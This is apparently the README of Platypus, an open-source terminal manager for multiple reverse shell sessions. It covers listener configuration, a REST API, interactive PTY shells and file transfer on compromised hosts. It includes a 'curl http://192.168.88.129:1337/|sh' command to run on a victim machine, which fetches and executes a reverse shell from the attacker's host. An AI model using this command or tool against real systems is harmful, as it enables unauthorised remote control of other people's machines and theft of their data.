A modern multiple reverse shell sessions/clients manager via terminal written in go
- Multiple service listening port
- Multiple client connections
- RESTful API
- Python SDK
- Reverse shell as a service (Pop a reverse shell in multiple languages without remembering idle commands)
- Download/Upload file with progress bar
- Full interactive shell
- Using vim gracefully in reverse shell
- Using CTRL+C and CTRL+Z in reverse shell
- Start servers automatically
- Initialize from configuration file
There are multiple ways to run this tool, feel free to choose one of the following method.
git clone https://github.com/WangYihang/Platypus
cd Platypus
go run platypus.go- Download
Platypusprebuild binary from HERE - Run the downloaded executable file
- Attack IP:
192.168.88.129- Reverse Shell Service:
0.0.0.0:1337 - Reverse Shell Service:
0.0.0.0:1338 - RESTful Service:
127.0.0.1:7331
- Reverse Shell Service:
- Victim IP:
192.168.88.130
First, run ./Platypus, then the config.yml will be generated automatically, and the config file is simple enough.
servers:
- host: "0.0.0.0"
port: 1337
#ย Platypusย isย ableย toย useย severalย propertiesย asย uniqueย identifierย (primiraryย key)ย ofย aย singleย client.
#ย Allย availableย propertiesย areย listedย below:
#ย `%i`ย IP
#ย `%u`ย Username
#ย `%m`ย MACย address
#ย `%o`ย Operatingย System
#ย `%t`ย Income TimeStamp
hashFormat: "%i %u %m %o"
- host: "0.0.0.0"
port: 1338
# Using TimeStamp allows us to track all connections from the same IP / Username / OS and MAC.
hashFormat: "%i %u %m %o %t"
restful:
host: "127.0.0.1"
port: 7331
enable: true
# Check new releases from GitHub when starting Platypus
update: falseAs you can see, platypus will check for updates, then start listening on port 1337, 1338 and 7331
The three port have different aims.
- 1337 Reverse shell server, which disallows the reverse session comes from the IP.
- 1338 Reverse shell server, which allows the reverse session comes from the IP.
- 7331 Platypus RESTful API EndPoint, which allows you to manipulate Platypus through HTTP protocol or Python SDK.
If you want another reverse shell listening port, just type Run 0.0.0.0 1339 or modify the config.yml.
Also, platypus will print help information about RaaS which release you from remembering tedious reverse shell commands.
With platypus, all you have to do is just copy-and-paste the curl command and execute it on the victim machine.
curl http://127.0.0.1:1337/|sh
curl http://192.168.88.129:1337/|shNow, suppose that the victim is attacked by the attacker and a reverse shell command will be executed on the machine of victim.
Notice, the RaaS feature ensure that the reverse shell process is running in background and ignore the hangup signal.
You can use List command to print table style infomation about all listening servers and connected clients. Notice that the port 1337 will reset the connection from the same machine (we consider two connection are same iff they share the same Hash value, the info being hash can be configured in config.yml). Port 1338 will not reset such connections, which provide more repliability.
Jump command can take you a tour between clients.
Use Jump [HASH / Alias] to jump. Alias is a alias of a specific client, you can set a alias of a client via Alias [ALIAS].
Also, for jumping through HASH, you do not need to type the whole hash, just prefix of hash will work.
All commands are case insensitive, feel free to use tab for completing.
Interact will popup a shell, just like netcat.
Use Download command to download file from reverse shell client to attacker's machine.
Use Upload command to upload file to the current interacting client.
Try to Spawn /bin/bash via Python, then the shell is fully interactive (You can use vim / htop and other stuffs).
First use Jump to select a client, then type PTY, then type Interact to drop into a fully interactive shell.
You can just simply type exit to exit pty mode.
Advanced Usages
- Reverse shell as a Service (RaaS)
- RESTful API
- Python SDK
Demonstration is to be done.
- #10 Use database to record all events and interacting logs
- #15 Encryption support
- Upgrade to Metepreter session
- Design Private Protocol
- Notify window resize
- Upgrade to private protocol
- Check whether dst is a folder in file uploading
- Router through clients
- RESTful API should auth
- Use crontab
- Use HR package to detect the status of client (maybe
echo $random_string) - Provide full kernel API
- List file
- Web UI
- Check exit state in WebSocket
- Benchmark
- #24 Upgrading platypus to a system service
- More interfaces in RESTful API
- Websocket for Web UI
- Continuous Integration
- #12 Add capability of setting human-readable name of session
- #7 Allow user to choose operation for the same IP income connection
- #25 Replace new connection from same IP with old one
- Test driven development [WIP]
- #19 Read command file when start up
- Add config file
- #30 RaaS support specifying language, thanks for @RicterZ
- Execute user input when input is not a built-in command
- Download/Upload progress bar
- #6 Send one command to all clients at once (Meta Command)
- User guide
- Upload file
- Download file
- #13 Add a display current prompt setting
- [DEPRECATED] Global Config (eg. #9 BlockSameIP)
- #11 Make STDOUT and STDERR distinguishable
- #23 Case insensitive CLI
- Delete command by @EddieIvan01
- OS Detection (Linux|Windows) by @EddieIvan01
- Upgrade common reverse shell session into full interactive session
- Docker support (Added by @yeya24)
This project exists thanks to all the people who contribute.
Thank you to all our backers! ๐ [Become a backer]
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]
